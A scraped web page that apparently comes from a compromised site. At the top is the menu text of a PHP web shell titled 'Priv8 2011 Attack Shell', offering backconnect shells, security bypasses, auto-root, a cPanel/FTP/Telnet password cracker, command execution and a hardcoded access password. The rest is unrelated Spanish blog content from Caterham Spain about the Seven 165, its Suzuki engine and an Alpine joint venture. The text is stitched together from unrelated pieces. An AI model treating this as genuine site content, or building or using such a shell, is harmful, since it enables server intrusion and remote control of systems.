#Priv8 2011 Attack Shell#

Server Pagerank Site list  Cgi Shell  Python Shell  Symlink Shell  perl Bypass Tools  Auto Root  Kullanici List  ShowsourceRead  Cgi Shell Priv pass=dz  Config Shell  LitespeedBypas
  SsiBypass  SuExecByps  Wordpress Mysql Admin Shell  Joomla Mysql Admin Shell  Php Eval Bypass  Php4 Bind 8888 Eval  Cpanel+Ftp+Telnet Cracker  Safe Mode php.ini  Mini Cgi
Change Dir :
Command Execute :
Upload :
Modeminizde 22 port açik olmali : Php Backconnect 1   Php Backconnect 2  Php Backconnect 3  Php Backconnect 4  Dc Backconnect  Perlsocket  Python Bacconnect  Python izo  Metasploit Bacconnect
Blog / Inicio - Caterham Spain
  • Nuevo AeroSeven Concept -

    Nuevo AeroSeven Concept

    Hoy presentación oficial en el GP de F1 de Singapore

    Llega lo último de Caterham, el nuevo AeroSeven Concept! Un concepto innovador y revolucionario cuya presentación oficial tendrá lugar hoy en el Gran Premio de F1 de Singapore, de la mano de Tony Fernandes.

    Más información en http://caterhamspain.com/Prensa (versión inglés)

  • El prototipo del nuevo Caterham Seven 165 se presentará en el Frankfurt Motor Show este mes de septiembre

    El nuevo Seven con motor Suzuki de 660cc está finalizando con "accesible fun", diversión accesible. // Objetivo: enero de 2014 con precio de venta PVP de 25.000€.

    El nuevo Caterham Seven básico se presentará en concepto de "prototipo" en el Frankfurt Motor Show de este año (10 a 22 de septiembre). Antes de la feria, el fabricante británico de automóviles deportivos ligeros ha revelado más detalles acerca de la variante del icónico Seven, que proporcionará un modelo más accesible a la gama actual, con el objetivo de venta de 25.000 € PVP matriculado, incluyendo los impuestos locales. (U.E - España.)

     

    El nombre oficial será el de Caterham Seven 165, una referencia principalmente a los 80 CV (x2) producidos por los 660cc de tres cilindros, con turbocompresor del motor K6A Suzuki, después de las mejoras realizadas por los ingenieros de Caterham Technology and Innovation (CTI). El número cinco, al final del apodo del coche, significa que el vehículo también cumple con los estándares de emisiones EU5, lo que le permite ser vendido en toda Europa continental. También cumple con el modo de homologación similar JC08 en Japón, mientras que, en el Reino Unido, habrá una variante distinta de este modelo, El Caterham Seven 160, que comenzará por debajo de £17,000.

     

    A pesar del motor Suzuki muy compacto, CTI ha afinado el motor K6A para ofrecer un mayor rendimiento que incluye un par de 107Nm, dando una reducción de consumo y de CO2.

     

    El CEO de Caterham Cars, Graham Macdonald, confirmó que "el proceso de ingeniería en la creación del Caterham Seven 165 está a punto de finalizar y creemos que el coche inspirará la creación de una nueva generación de conductores Caterham entusiastas. A principios de este año, hemos introducido en Europa el SEVEN más rápido y más potente de la historia, el Seven 485. El 165 se ubicará en el extremo opuesto de la escala, tanto a nivel del tamaño del motor como de precio. Lo más hermoso es que los dos SEVEN ofrecen exactamente el mismo nivel de placer de conducción pura. Tanto si se es un conductor muy experimentado o principiante en coches deportivos en Caterham encontrará el qué más le convenga”.

     

    La producción del Caterham Seven 165 se iniciara en enero de 2014 y con las primeras entregas en primavera.

     

    Nota de prensa 02 de septiembre 2013.

  • Motor Suzuki en Caterham

    Motor Suzuki para el nuevo modelo Caterham Seven

    19-08-2013

    El nuevo modelo tendrá un motor Suzuki 660 cc. turbo.

    Diseñado para el máximo ahorro de peso, eficiencia y diversión

    “Caterham Cars " lanzara un modelo SEVEN totalmente nuevo. Este Seven estará propulsado por un motor de 660 cc, tres cilindros turbo fabricado por Suzuki Motor Corporation - el motor más pequeño y más eficiente jamás instalado en un Seven.

    El nuevo vehículo utiliza la ingeniería del siglo 21 para rendir homenaje a los primeros míticos SEVEN mediante la utilización de un motor turbo súper-compacto y ligero Este SEVEN será el más ligero en la historia del SEVEN.

    El motor ultra eficiente, reducido combinado con una caja de cambios Suzuki de cinco velocidades, igualmente compacto, ha sido adaptada por Caterham Technology & Innovación (CTI) - división de ingeniería de Caterham Group - para ir montado en un chasis rediseñado con nueva suspensión adaptada.

    La experiencia de Suzuki y reconocido especialista en el diseño de vehículos compactos y eficientes, significaba que Suzuki era el socio ideal para Caterham para conseguir su objetivo de crear el más eficiente, más ligero Seven que nunca.

    Los especialistas en sistemas de propulsión de CTI han afinado el motor para adaptarse a la dinámica del SEVEN, lo que resulta en un coche capaz de rendimientos fuertes, con el ahorro de consumo de combustible y la reducción de emisiones de CO2.

    Graham Macdonald, CEO de Caterham Cars dijo: "No es el tamaño del motor lo que importa, nuestro barómetro es el factor de sonrisa del conductor y creemos que tenemos la fórmula perfecta para el nuevo SEVEN básico.

    "Suzuki es una empresa líder en la producción de vehículos compactos con motores muy eficientes y es claramente una pasión compartida. Necesitábamos un sistema de propulsión especialmente ligero, pero tenía que ser una unidad que se adapta a las características propias de los SEVEN - por suerte, después de mucho trabajo duro, tenemos un pacto perfecto.

    "Nuestra intención para este coche es ofrecer la alegría de los SEVEN en forma destilada, por lo que el nuevo coche básico será más ligero, más barato, más económico y más accesible que nunca. El nuevo modelo se pondrá en otoño de este año para el mercado del Reino Unido, con las primeras entregas espera antes de finales de 2013.”

    Los modelos para España y Europa con homologación europea estarán a la venta a partir de enero 2014. El precio y las prestaciones sorprenderán.

  • Nuevo Caterham 2015

    Caterham-Renault

    05-11-2012

    Una joint venture entre Caterham y Renault - Alpine. Ambas compañías crean la Société des Automobiles Alpine Caterham (SAAC).

    Cada una poseerá el 50% de la misma y a cuyo frente como director general han designado Bernard Ollivier. Se espera que los primeros modelos vean la luz en 2015.

    Desde su nacimiento, los modelos Alpine habían estado basados en modelos de Renault e incluso montaban bastantes piezas de la marca del rombo. De esta forma, en el año xxxx, el pez grande adquirió la mayoría del capital de Alpine.

    Caterham, el otro socio de Renault para relanzar Alpine nace por la misma época que la francesa pero como concesionario de la marca Lotus. De hecho, el primer vínculo entre Alpine, Renault y Caterham se produce a mediados de los años 60. Colin Champman, creador del Lotus Elan se convierte en la inspiración de los diseñadores de Alpine de la época.

    Tanto Carlos Goshn, presidente de la alianza Renault-Nissan como Tony Fernandes, presidente de Caterham y propietario de Air Asia, no dudan en alabar el relanzamiento, aunque sin hablar de modelos concretos. Sí dejaron claro que Caterham y Renault sacarán como mínimo un modelo cada año bajo la denominación Alpine y Caterham partir de 2015.

    Esta alianza supone la unión de dos pequeñas fábricas especializadas en el mundo de la alta competición. Por un lado están las 300 personas que trabajan en la fábrica de Renault en Dieppe al noroeste de Francia junto con los 50 que trabajan en la planta de Caterham en Dartford (Reino Unido).

    La factoría de Dieppe se sitúa en el mismo lugar donde nació Alpine allá por 1955. Desde que Renault decidió vender su equipo de Formula 1 (con el que Fernando Alonso consiguió sus dos campeonatos del mundo) en 2010, la fábrica que formaba parte del Renault F1 Team pasó a desarrollar los coches de serie más deportivos de Renault.

    Caterham también cuenta con un equipo de Formula 1 ya que el año pasado, Tony Fernandez, dueño del equipo Formula 1 Lotus Team se hizo con el control de Caterham. Ahora la escudería se denomina Caterham F1 Team.

    He aquí otro punto de unión entre Renault y Caterham. La francesa, a pesar de no contar con equipo propio en la Fórmula 1, suministra motores a varios equipos como Red Bull, Williams, Lotus Renault y al propio Caterham.
    De este modo, se unen dos marcas con una dilatada carrera en el mundo de la alta competición.

    Una de las características de los Caterham es su sencillez, su deportividad extrema, su escaso mantenimiento y su bajo precio (desde 30.000 a 55.000 euros con potencias entre 120 y 200 caballos) para las prestaciones que ofrece. Algo parecido ocurría con la antigua Alpine. El A110 capaz de alcanzar en la década de los 70 los 210 kilómetros por hora, resultaba bastante más asequible que el Porsche 911 con el que competía en el campeonato del mundo de rallies.

    De ahí que Tony Fernandes haya asegurado que "el objetivo de esta alianza es hacer llegar a un público mayor un vehículo que tenga ADN no sólo de Alpine sino de la Fórmula 1". Según los expertos los futuros modelos bajo la enseña Alpine estarían en el entorno de los 40.000 o 50.000 euros.

    Las teorías de ambos presidentes confluyen. Fernandes alude claramente a que la gente no se puede permitir comprar un Ferrari o un McLaren porque su precio supera los 200.000 euros. Sin embargo, sí estaría dispuesta a pagar 50.000 euros por un vehículo menos potente que un Ferrari (tendría uno 250 caballos) pero que, al derivar de la tecnología de la Fórmula 1, ofrecerá muchísimas prestaciones al conductor por su ligereza.

    Por su parte, Goshn espera un crecimiento de un 15% en las adquisiciones de este tipo de vehículos a medio plazo. El presidente de Renault tiene claro que en el mercado europeo las marcas generalistas están agotadas. Por eso su empeño en buscar nuevos nichos de mercado. Y el de Alpine – Caterham puede resultar más rentable ya que en los vehículos premium, el margen para el fabricante es mayor.

    Su precio se sitúara en el entono de los 50.000 euros. Contar con una potencia de 250 caballos, poco más de 1.200 kilos de peso y una electrónica muy poco intrusiva, es un aliciente para aquellos apasionados de la conducción.

  • Caterham UK

    Press release

    05 de noviembre 2012

    CATERHAM CARS ANNOUNCES PLAN TO DEVELOP STUNNING NEW SPORTSCAR
    Caterham Cars, producer of the iconic Seven, today announced advanced plans to produce a bold new sportscar that will signal its future ambitions and lay the foundations for an expansive product family that will deliver ‘accessible fun’ to new markets.

    As the brand looks to build on nearly 40 years of evolving the UK-designed and built, lightweight Seven two-seater, and most recently the SP/300.R sports prototype trackday car, the all-new everyday sportscar will be a product of a joint-venture engineering project with Renault.

    The model will form the first phase of an ambitious development plan for Caterham Cars as it capitalises on the global footprint enjoyed by the parent Caterham Group, which now includes Caterham F1 Team, Caterham Technology & Innovation and Caterham Composites.

    The new sportscar will be built in Dieppe, France, benefitting from the plant’s volume manufacturing capability. Production of the Seven, SP/300.R and forthcoming Caterham Kart will remain in the UK (Dartford, Kent), alongside the engineering expertise and facilities of Caterham F1 Team (Leafield, Oxfordshire) and Caterham Technology & Innovation (Hingham, Norfolk), which specialises in advanced concepts, lightweight structures, enhanced powertrains, control systems, advanced materials and manufacturing technologies.

    Upon launch, the new model would feature the complementary expertise of partners Renault, Renault Sport Technologies and Caterham Technology & Innovation to deliver a truly global product.

    Technical, volume and pricing details will be announced in due course.

Próximamente